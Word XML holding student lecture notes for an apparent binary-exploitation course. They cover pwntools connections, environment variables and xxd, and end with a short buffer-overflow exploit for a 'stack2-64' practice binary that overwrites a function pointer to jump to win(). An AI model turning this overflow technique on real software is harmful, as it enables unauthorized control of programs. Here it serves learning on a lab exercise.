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D6F7" w14:textId="7A4DCB26" w:rsidR="00B60CD4" w:rsidRPr="00B14CC8" w:rsidRDefault="00814F22" w:rsidP="00814F22">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14CC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lecture 2 Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15777368" w14:textId="29D86DF2" w:rsidR="00814F22" w:rsidRDefault="00814F22" w:rsidP="00814F22">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFEB39B" w14:textId="6851419C" w:rsidR="00B14CC8" w:rsidRPr="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B740A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B740A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B740A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to connect to a server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF0E71" w14:textId="5C26C461" w:rsidR="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="7DAA2C8A" w14:textId="3B6B2A84" w:rsidR="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = “path to the directory that holds the binary”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194AE8AA" w14:textId="72A18B43" w:rsidR="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">S = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">‘_’, ‘shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6880B4" w14:textId="7D658B9A" w:rsidR="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>s.process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(‘./binary’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA99C84" w14:textId="74E63A4F" w:rsidR="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="3F57D80B" w14:textId="37D08122" w:rsidR="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(“exploit goes here”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6D5A2" w14:textId="654EDA4A" w:rsidR="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.recvall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D192592" w14:textId="67715CAB" w:rsidR="007B740A" w:rsidRDefault="007B740A" w:rsidP="00B14CC8">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.wait</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD049C" w14:textId="3FA68B25" w:rsidR="009E4053" w:rsidRDefault="009E4053" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="7334E64E" w14:textId="4F742357" w:rsidR="009E4053" w:rsidRDefault="009E4053" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="357C94C0" w14:textId="523B072E" w:rsidR="009E4053" w:rsidRDefault="00922CB1" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enviorment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CFDEFB" w14:textId="26D197F5" w:rsidR="00922CB1" w:rsidRDefault="00922CB1" w:rsidP="00B14CC8">
      <w:r>
        <w:t>Passed to a process upon creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BF66BF" w14:textId="4D8147EF" w:rsidR="00922CB1" w:rsidRDefault="00922CB1" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">Allows a program to use them when the virtual address space is allocated. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B177FC" w14:textId="2FBEF8FF" w:rsidR="00922CB1" w:rsidRDefault="00922CB1" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">Array of env variables </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stored at the top of the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C632734" w14:textId="12E3C432" w:rsidR="00922CB1" w:rsidRDefault="00922CB1" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="46EA5E86" w14:textId="355844E3" w:rsidR="00922CB1" w:rsidRPr="009133DF" w:rsidRDefault="00034565" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009133DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Terminal Inputs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16577B27" w14:textId="2FEC7967" w:rsidR="00034565" w:rsidRDefault="00034565" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">Piping into | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will give you the hex dump of the input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFA2323" w14:textId="3DF37291" w:rsidR="009133DF" w:rsidRDefault="0030027D" w:rsidP="00B14CC8">
      <w:r>
        <w:t>Inside `` will execute it as a command which can be put into other programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F05C9" w14:textId="0D186A96" w:rsidR="00284DC2" w:rsidRPr="00922CB1" w:rsidRDefault="00284DC2" w:rsidP="00B14CC8">
      <w:r>
        <w:t>Always check the Endian format for what the input is expecting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258DDD2" w14:textId="67176AB2" w:rsidR="00814F22" w:rsidRDefault="00814F22" w:rsidP="00814F22">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08651B64" w14:textId="3A350970" w:rsidR="00B14CC8" w:rsidRDefault="002279D1" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ALWAYS CHCEK YOUR ASSUMPTIONS OF WHAT YOU SET IS CORRECT PIPING INTO | XXD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7E967" w14:textId="77777777" w:rsidR="00FA1544" w:rsidRDefault="00FA1544" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767814F2" w14:textId="5BEFCD6D" w:rsidR="00FA1544" w:rsidRDefault="00FA1544" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ALWAYS CONSIDER WHAT INPUT TYPE THE MEMORY IS EXPECTING!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A8B8B3" w14:textId="78C2664B" w:rsidR="005E05BA" w:rsidRDefault="005E05BA" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54DB3F16" w14:textId="7A1001EF" w:rsidR="005E05BA" w:rsidRDefault="005E05BA" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532730F3" w14:textId="218DAF53" w:rsidR="005E05BA" w:rsidRDefault="005E05BA" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538BBCD9" w14:textId="32D8A56D" w:rsidR="005E05BA" w:rsidRDefault="005E05BA" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4F2336" w14:textId="022AB8C1" w:rsidR="005E05BA" w:rsidRDefault="005E05BA" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stack2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE7BDC" w14:textId="643609E3" w:rsidR="005E05BA" w:rsidRDefault="00781BD2" w:rsidP="00B14CC8">
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a function pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08263C69" w14:textId="54BCDC09" w:rsidR="00781BD2" w:rsidRDefault="00781BD2" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">We want </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pointing to the function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) not 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C521896" w14:textId="24863219" w:rsidR="00781BD2" w:rsidRDefault="00781BD2" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="4B3CA972" w14:textId="76F484FA" w:rsidR="00781BD2" w:rsidRDefault="00781BD2" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">We need to buffer overflow into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to change its address to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E6EFF" w14:textId="6214EFFF" w:rsidR="00781BD2" w:rsidRDefault="00781BD2" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="5847EECA" w14:textId="5B38E068" w:rsidR="00781BD2" w:rsidRDefault="00DC24A9" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>disass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> *win that show the code decompiled inside the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>win(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3005E93F" w14:textId="566F941E" w:rsidR="00DC24A9" w:rsidRDefault="00DC24A9" w:rsidP="00B14CC8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Win_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0x00005555554007aa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11923039" w14:textId="3E461402" w:rsidR="00DC24A9" w:rsidRDefault="00DC24A9" w:rsidP="00B14CC8">
      <w:r>
        <w:t>Buffer &amp; FP are 72 bytes apart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A57D6" w14:textId="5D9ECC26" w:rsidR="00DC24A9" w:rsidRDefault="00DC24A9" w:rsidP="00B14CC8">
      <w:r>
        <w:t xml:space="preserve">Use p64 in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> because function addresses are 8 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300AB56F" w14:textId="3BD71514" w:rsidR="00DC24A9" w:rsidRDefault="00DC24A9" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="4550650D" w14:textId="384173D2" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="42051FCC" w14:textId="59A1AD26" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="2A7C750E" w14:textId="77777777" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8"/>
    <w:p w14:paraId="3D7987AE" w14:textId="28A9B1D9" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Context.clear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(arch=’amd64’, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=’debug’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F88CF5" w14:textId="1E30FB8E" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(‘./stack2-64’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582F3ED1" w14:textId="4D0AB062" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0x00005555554007aa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD740A" w14:textId="151A81F7" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buffsize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAE1A4E" w14:textId="34F8AF68" w:rsidR="00DC24A9" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0096016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00DC24A9" w:rsidRPr="0096016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xploit_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC24A9" w:rsidRPr="0096016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC24A9" w:rsidRPr="0096016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>b’a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC24A9" w:rsidRPr="0096016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’*72+</w:t>
      </w:r>
      <w:r w:rsidRPr="0096016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0096016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>win_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0096016E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DF7FB" w14:textId="6CCF31CC" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B6423D" w14:textId="6EC42FEE" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p.sendline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exploit_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776FA84E" w14:textId="6D50F308" w:rsidR="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p.recvall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55885F95" w14:textId="11C54ADD" w:rsidR="0096016E" w:rsidRPr="0096016E" w:rsidRDefault="0096016E" w:rsidP="00B14CC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p.wait</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0096016E" w:rsidRPr="0096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22"/>
    <w:rsid w:val="00034565"/>
    <w:rsid w:val="002279D1"/>
    <w:rsid w:val="00284DC2"/>
    <w:rsid w:val="0030027D"/>
    <w:rsid w:val="005E05BA"/>
    <w:rsid w:val="00781BD2"/>
    <w:rsid w:val="007B740A"/>
    <w:rsid w:val="00814F22"/>
    <w:rsid w:val="009133DF"/>
    <w:rsid w:val="00922CB1"/>
    <w:rsid w:val="0096016E"/>
    <w:rsid w:val="009E4053"/>
    <w:rsid w:val="009F3819"/>
    <w:rsid w:val="00A50639"/>
    <w:rsid w:val="00B116D4"/>
    <w:rsid w:val="00B14CC8"/>
    <w:rsid w:val="00B60CD4"/>
    <w:rsid w:val="00DC24A9"/>
    <w:rsid w:val="00FA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F102A2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A20F69D0-9D8D-4D4C-AFFC-268E89C5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Cabral, Justin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Cabral, Justin</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-25T12:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-25T22:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>